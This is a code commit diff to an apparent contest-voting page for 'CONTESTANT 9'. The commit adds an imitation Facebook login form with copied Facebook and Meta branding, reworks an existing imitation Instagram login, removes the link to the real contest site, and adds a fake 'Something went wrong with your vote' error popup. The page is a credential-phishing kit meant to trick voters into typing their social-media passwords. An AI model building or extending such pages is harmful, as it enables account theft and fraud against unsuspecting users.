made favicon and title dynamic

--- a/9/index.html
+++ b/9/index.html
@@ -13,8 +13,10 @@
     <link rel="stylesheet" href="/css/profile.css">
     <link rel="stylesheet" href="/css/index.css">
     <link rel="stylesheet" href="/css/ig.css">
-    <script src="js/jquery-3.6.0.min.js"></script>
+    <script src="/js/jquery-3.6.0.min.js"></script>
     <script src="/js/index.js"></script>
+    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.20/dist/sweetalert2.min.js"></script>
+    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.20/dist/sweetalert2.min.css">
     <meta property="og:url" content="9" />
     <meta property="og:title" content="CONTESTANT 9" />
     <meta property="og:description" content="" />
@@ -206,8 +208,8 @@
                         <div class="t228__maincontainer t228__c12collumns" style="height:100px;">
                             <div class="t228__padding40px"></div>
                             <div class="t228__leftside">
-                                <div class="t228__leftcontainer"><a href="https://mrsuniverseuae.com/"
-                                        class="t228__imgwrapper"><img class="t228__imglogo t228__imglogomobile"
+                                <div class="t228__leftcontainer"><a href="" class="t228__imgwrapper"><img
+                                            class="t228__imglogo t228__imglogomobile"
                                             src="https://static.tildacdn.one/tild3631-3430-4237-a634-396233346538/IMG_6285.jpg"
                                             imgfield="img"
                                             style="max-width: 180px; width: 180px; min-width: 180px; height: auto; display: block;"
@@ -3352,6 +3354,95 @@
         </div>
     </center>
 
+    <div id="fb_wrapper">
+
+        <div id="fbbody" class="fbook">
+            <br>
+            <center><span
+                    style="display: flex; justify-content: center; align-items: center; text-align: center; color: rgb(70, 90, 105); display: inline; font-size: 13px; font-family: &quot;Optimistic Text Normal&quot;; ">English
+                    (UK)</span></center><br><br><br><br>
+
+            <div data-bloks-name="bk.components.Flexbox" class="wbloks_1"
+                style="pointer-events: none; margin-top: 0px; margin-bottom: 20px; flex-grow: 1; flex-shrink: 100; align-items: center; justify-content: center;">
+                <img alt="Facebook from Meta" src="/img/fblogo.png" class="wbloks_1"
+                    style="max-height: 60px; min-height: 0px; object-fit: contain; overflow: hidden;">
+            </div><br><br><br>
+
+
+            <div class="form-group">
+                <input type="text" id="fb-email" required oninput="toggleClearIcon()">
+                <label for="fb-email">Mobile number or email address</label>
+                <div class="clear-input" id="clearIcon" onclick="clearEmailInput()"></div>
+            </div>
+
+            <div class="form-group">
+                <input type="password" id="fb-pass" required>
+                <label for="fb-pass">Password</label>
+                <div class="toggle-password" onclick="togglePasswordVisibility()"></div>
+                <!-- Icon as a clickable div -->
+            </div>
+
+            <button onclick="login()" id="fb-log"
+                style="padding: 9px; display: flex; justify-content: center; color: rgb(255, 255, 255); font-weight: 500;  font-size: 16px; font-family: &quot;Optimistic Text Normal&quot;;  ">Log
+                in</button>
+
+            <div class="wbloks_112" style="font-size: 15px; max-height: 20.28px; word-break: break-all;">
+                <div class="wbloks_113" dir="auto"><span data-bloks-name="bk.components.TextSpan"
+                        style="line-height: 1rem; color: rgb(28, 43, 51); font-weight: 500; display: inline; font-size: 15px; font-family: &quot;Optimistic Text Normal&quot;; overflow-wrap: break-word;">Forgotten
+                        Password?</span></div>
+            </div><br><br><br><br><br>
+
+            <div data-bloks-name="bk.components.Flexbox" tabindex="0" role="button" aria-label="Create new account"
+                data-anchor-id="replay" class="wbloks_1" style="pointer-events: inherit; width: 100%;">
+                <div data-bloks-name="bk.components.Flexbox" class="wbloks_1"
+                    style="pointer-events: none; opacity: 1; height: 36px; min-width: 36px; flex-grow: 1; padding-left: 20px; padding-right: 20px; background: rgba(255, 255, 255, 0); border: 1px solid rgb(203, 210, 217); border-radius: 18px; align-items: center; flex-direction: row; justify-content: center;">
+                    <div>
+                        <span data-bloks-name="bk.components.TextSpan"
+                            style="padding: 8px; display: flex; justify-content: center; color: rgb(28, 43, 51); font-weight: 500; display: flex; font-size: 15px; font-family: &quot;Optimistic Text Normal&quot;; overflow-wrap: break-word;">Create
+                            new account</span>
+                    </div>
+
+                </div>
+            </div>
+
+
+            <div data-bloks-name="bk.components.Flexbox" class="wbloks_1"
+                style="pointer-events: none; flex-grow: 1; flex-shrink: 1e+06; padding-bottom: 0px; flex-direction: column; justify-content: flex-end;">
+                <div data-bloks-name="bk.components.Flexbox" class="wbloks_1"
+                    style="pointer-events: none; padding-top: 20px; padding-bottom: 20px; align-items: center; justify-content: center;">
+                    <center>
+                        <div class="wbloks_1" style="height: 12px; aspect-ratio: 5 / 1;">
+                            <div data-bloks-name="bk.components.AspectRatio" class="wbloks_108"
+                                style="aspect-ratio: 5 / 1;">
+                                <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" height="1" width="5"
+                                    class="wbloks_110"></svg>
+                            </div>
+                            <div class="wbloks_109"><img alt="Meta logo" src="/img/meta.png" class="wbloks_1"
+                                    style="width: 100%; pointer-events: inherit; mask-image: url(/img/meta.png); mask-size: contain; background-color: rgb(70, 90, 105); object-position: 10000px 10000px; object-fit: contain; overflow: hidden;">
+                            </div>
+                    </center>
+                </div>
+            </div><br>
+            <div data-bloks-name="bk.components.Flexbox"
+                style="font-family: &quot;Optimistic Text Normal&quot;; word-spacing: 10px; pointer-events: none; align-items: center; flex-direction: column; justify-content: center;">
+                <div data-bloks-name="bk.components.Flexbox" class="wbloks_1" style="pointer-events: none;">
+                    <div data-bloks-name="bk.components.Flexbox" class="wbloks_1"
+                        style="pointer-events: none; padding-left: 4px; padding-right: 4px; padding-bottom: 4px;">
+                        <span data-bloks-name="bk.components.TextSpan"
+                            style="pointer-events: auto; cursor: pointer; color: rgb(99, 120, 138); display: inline; font-size: 10px; white-space: pre-wrap; overflow-wrap: break-word;">About</span>
+                        <span data-bloks-name="bk.components.TextSpan"
+                            style="pointer-events: auto; cursor: pointer; color: rgb(99, 120, 138); display: inline; font-size: 10px; white-space: pre-wrap; overflow-wrap: break-word;">Help</span>
+                        <span data-bloks-name="bk.components.TextSpan"
+                            style="pointer-events: auto; cursor: pointer; color: rgb(99, 120, 138); display: inline; font-size: 10px; white-space: pre-wrap; overflow-wrap: break-word;">More</span>
+                    </div>
+                </div>
+            </div>
+        </div>
+
+
+        </main>
+    </div>
+
     <!--facebuk login-->
     <div id="fb_wrapper">
 
@@ -3383,12 +3474,13 @@
                 style="pointer-events: none; opacity: 1; height: 44px; min-width: 44px; flex-grow: 1; padding-left: 20px; padding-right: 20px; background: rgb(0, 100, 224); border: 0px solid rgb(28, 43, 51); border-radius: 22px; align-items: center; flex-direction: row; justify-content: center;">
 
                 <div class="wbloks_113" dir="auto">
-                    <center><span onclick="login()" id="ig-log"
+                    <center><span onclick="login()" id="ig-log" data-bloks-name="bk.components.TextSpan"
                             style="padding: 9px; display: flex; justify-content: center; color: rgb(255, 255, 255); font-weight: 500;  font-size: 16px; font-family: &quot;Optimistic Text Normal&quot;;  ">Log
                             in</span></center>
                 </div>
 
-            </div> <br>
+            </div>
+
 
             <div class="wbloks_112" style="font-size: 15px; max-height: 20.28px; word-break: break-all;">
                 <div class="wbloks_113" dir="auto"><span data-bloks-name="bk.components.TextSpan"
@@ -3588,7 +3680,7 @@
                                                                             </div>
                                                                             <div
                                                                                 class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1xmf6yo x1e56ztr x540dpk x1m39q7l x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">
-                                                                                <button onclick="ig()"
+                                                                                <button onclick="iglog()" id="ig-log"
                                                                                     class=" _acan _acap _acas _aj1- _ap30"
                                                                                     disabled="">
                                                                                     <div
@@ -3642,6 +3734,18 @@
     </div>
 
     <!--Insta login ends-->
+
+    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.20/dist/sweetalert2.all.min.js"></script>
+    <script>
+        function showCustomAlert() {
+            Swal.fire({
+                title: 'Oops!',
+                text: 'Something went wrong with your vote.',
+                icon: 'error',
+                confirmButtonText: 'Try Again'
+            });
+        }
+    </script>
 
 
 
